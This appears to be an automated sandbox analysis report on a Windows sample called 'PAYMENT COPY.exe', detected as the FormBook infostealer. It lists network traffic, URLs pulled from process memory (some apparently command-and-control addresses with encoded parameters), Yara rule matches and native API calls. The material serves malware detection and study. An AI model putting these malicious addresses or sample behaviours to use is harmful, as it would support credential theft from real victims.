Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:23:39 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeAccess-Control-Allow-Origin: http://www.drednents.esVary: Origin, Accept-EncodingAccess-Control-Allow-Credentials: trueX-XSS-Protection: 1; mode=blockX-Frame-Options: DENYX-Download-Options: noopenX-Content-Type-Options: nosniffETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BhXBWkFoELlqTpd97BSDvjWkW%2FO83QA%2FaCqzRbEO%2FeuKXQlsff%2FPFT7Nkn%2Bj9tqY7srBcTwdyuniL0oB8rpTvOYaIrWNajhWnQx0cwBIk%2FofUkOsmLTOiFtvVzUrEeXqyAtM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88a54a69dc214326-EWRalt-svc: h3=":443"; ma=86400Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:23:41 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeVary: Origin, Accept-EncodingAccess-Control-Allow-Credentials: trueX-XSS-Protection: 1; mode=blockX-Frame-Options: DENYX-Download-Options: noopenX-Content-Type-Options: nosniffETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L3BK76tXvW1IJNnKCjCxV6mgifOb0z6REFTfKKCpTHtZA2%2FHLxkvlpzMCZI1jVBcCKK0AGn043yvxe6MpDJe9fy2af4N9qkt5iFVApuZATvzUPIXJ%2FboVNG7fn5QjEV9Q%2Buh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88a54a79a9291a03-EWRalt-svc: h3=":443"; ma=86400Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found

Source: gpresult.exe, 0000000D.00000002.4949275030.000000000670E000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003F3E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://arsenjev.fun/oqq6/?VlEHDVvh=rwgwPlALEUzYU2aVnuvDPIeIRMF/prMxeEAjcX/DBUkDQJY
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000058EC000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.000000000311C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://celluslim.com.br/y8lu/?VlEHDVvh=mWlJviWR5LwtuCLZCQRXGA
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000068A0000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000040D0000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://embrace-counselor.com/5xhc/?VlEHDVvh=MlmeOAVABHl7V7JWE669wIJbTLHKaUkhN9NjdS3PgsP7eMcTlCivolpO
Source: firefox.exe, 00000015.00000002.2995518665.0000022CE0647000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp)
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000055C8000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://mediciconstanta.ro/jaeg/?VlEHDVvh=9Opn4WO2xZgxxNDkNGsIia6GoKuxBfXh3HU6nJUJOovQ2Daq2EsR8T6osHZ
Source: PAYMENT COPY.exe, 00000000.00000002.2533735026.0000000002ABF000.00000004.00000800.00020000.00000000.sdmp, bQrgcvrrXfGN.exe, 0000000A.00000002.2583123320.0000000002F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4950914597.0000000004B70000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.drednents.es
Source: JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4950914597.0000000004B70000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.drednents.es/9bwj/
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://2domains.ru
Source: gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: gpresult.exe, 0000000D.00000002.4949275030.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003440000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
Source: gpresult.exe, 0000000D.00000002.4949275030.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003440000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
Source: gpresult.exe, 0000000D.00000002.4949275030.0000000005F34000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003764000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb
Source: gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Medium.woff)
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Medium.woff2)
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Regular.woff)
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Regular.woff2)
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://help.hover.com/home?source=expired
Source: gpresult.exe, 0000000D.00000002.4945562552.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: gpresult.exe, 0000000D.00000002.4945562552.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: gpresult.exe, 0000000D.00000002.4945562552.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: gpresult.exe, 0000000D.00000002.4945562552.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: gpresult.exe, 0000000D.00000002.4945562552.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: gpresult.exe, 0000000D.00000002.4945562552.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: gpresult.exe, 0000000D.00000003.2878831218.0000000007999000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: gpresult.exe, 0000000D.00000002.4949275030.000000000657C000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003DAC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://ovipanel.in/
Source: gpresult.exe, 0000000D.00000002.4949275030.000000000657C000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003DAC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://ovipanel.in/tutorials
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://reg.ru?target=_blank
Source: firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://server5.hosting.reg.ru/manager
Source: gpresult.exe, 0000000D.00000002.4949275030.0000000006258000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003A88000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://tilda.cc
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://twitter.com/hover
Source: gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000063EA000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4949275030.0000000005DA2000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000035D2000.00000004.00000001.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003C1A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/?source=expired
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/about?source=expired
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/domain_pricing?source=expired
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/domains/results
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/email?source=expired
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/privacy?source=expired
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/renew/domain/pinpointopia.com?source=expired
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/renew?source=expired
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/tools?source=expired
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/tos?source=expired
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/transfer_in?source=expired
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.instagram.com/hover_domains
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=&utm_medium=expired&utm_campaign
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/hosting/?utm_source=&utm_medium=expired&utm_campaign
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/ssl-certificate/?utm_source=&utm_medium=expired&utm_campaign
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/support/#request
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/support/hosting-i-servery/moy-sayt-ne-rabotaet/oshibka-404
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/vps/?utm_source=&utm_medium=expired&utm_campaign
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/vps/cloud/?utm_source=&utm_medium=expired&utm_campaign
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-tools/geoip?utm_source=&utm_medium=expired&utm_campaign
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-tools/myip?utm_source=&utm_medium=expired&utm_campaign
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-tools/port-checker?utm_source=&utm_medium=expired&utm_campaign
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/whois/?utm_source=&utm_medium=expired&utm_campaign
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/whois/check_site?utm_source=&utm_medium=expired&utm_campaign
Source: gpresult.exe, 0000000D.00000002.4949275030.0000000005F34000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003764000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.zoho.com/sites/?src=parkeddomain&dr=www.topscaleservices.com
Source: gpresult.exe, 0000000D.00000002.4949275030.0000000005F34000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003764000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.zoho.com/sites/images/professionally-crafted-themes.png

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 9.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2720133115.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2683419867.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2681925571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4947433222.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4947527933.0000000004630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4950914597.0000000004B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2693537952.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4954573044.0000000005CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2726398556.00000000033E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.2720133115.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.2683419867.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.2681925571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.4947433222.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.4947527933.0000000004630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.4950914597.0000000004B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.2693537952.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.4954573044.0000000005CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.2726398556.00000000033E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: PAYMENT COPY.exe

Contains functionality to call native functions

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0042B933 NtClose,	9_2_0042B933
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0040AC8E NtDelayExecution,	9_2_0040AC8E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502B60 NtClose,LdrInitializeThunk,	9_2_01502B60
